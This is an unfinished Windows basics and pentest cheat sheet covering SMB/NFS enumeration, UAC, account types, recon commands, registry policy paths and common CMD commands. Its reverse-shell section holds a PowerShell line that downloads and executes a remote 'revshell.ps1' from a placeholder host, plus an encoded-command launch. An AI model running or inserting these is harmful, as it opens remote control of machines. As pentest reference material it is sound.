Skip to content

This article is currently being written.

Windows basic

Pentest Tools

SMB

Enumerate shares and access :

$ crackmapexec smb example.com --shares
$ smbclient -L example.com

NFS

Display shared folders by the NFS server :

$ showmount -e example.com
$ sudo mount -t nfs example.com:/shared_folder /mnt/folder

Reverse shell

Powershell

HTTP Request

C:\> iwr http://example.com/

C:\> Invoke-WebRequest 'https://example.com/files/backup.zip' -OutFile C:\backup.zip

Run a PowerShell expression

C:\> IEX( IWR http://example.com/revshell.ps1 )

C:\> powershell.exe -EncodedCommand <base64>

User Account Control (UAC)

The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Windows Security alerts in Windows 10

Source Wikipedia.

Type of accounts

Account Permissions
Guest Can use portable software and can not change system settings.
Standard Can use portable software and change system settings that don’t affect other users.
Administrator Complete control over the PC.
System Complete control over the PC.
Domain Administrator Complete control over all the PC of the domain.

Information gathering

Networks information

IPv4, DNS Server, Network Mask, Mac Adress, ...

C:\> ipconfig /all

Environment variables

Display all the environment variables :

C:\> set
  • APPDATA : Path to the application data directory.
  • TEMP : Path to the temporary directory.
  • PUBLIC : Path to the public directory (all users have READ & WRITE permission)
  • LOGONSERVER : Authentification server.
  • ...

User & group information

Find information about the current user :

C:\> net user %username%
C:\> net user %username% /domain

Find administration users and groups :

C:\> net localgroup administrators

Manage permissions

Microsoft Management Console (MMC)

You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.

Source Microsoft.

Lauch the MMC panel :

C:\> mmc.exe

Displays all available information about Group Policy :

C:\> gpresult /z

Docs about gpresult.

Registry Editor (regedit)

The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.

Source Wikipedia.

Path for policies in regedit :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Policies
LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
LOCAL_MACHINE\Software\Policies

Windows firewall

Windows Firewall (officially called Windows Defender Firewall in Windows 10), is a firewall component of Microsoft Windows.

Source Wikipedia.

C:\> netsh advfirewall

Windows commands

cd

C:\> e:
E:\> d:
D:\> cd Documents
D:\Documents>
  • C: Windows system disk.
  • D: Data storage disk.
  • E: Data storage disk.
  • X: Disk use by Windows PE to start.

Info

The name of a disk is just a label, the letters are totally arbitrary.

dir

List content of a directory.

mkdir

mkdir create directory.

C:\> mkdir <directory>

del

del delete file.

C:\> del <filename>

rmdir

rmdir delete folder.

C:\> rmdir <folder>

Info

Use the argument /S to remove all the files within the folder.

move

C:\> move <src> <dst>

copy

copy only copies files, but not the folders within.

C:\> copy <src> <dst>

xcopy

xcopy copies files (including the folders within).

C:\> xcopy <src> <dst>

icacls

Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

Back to top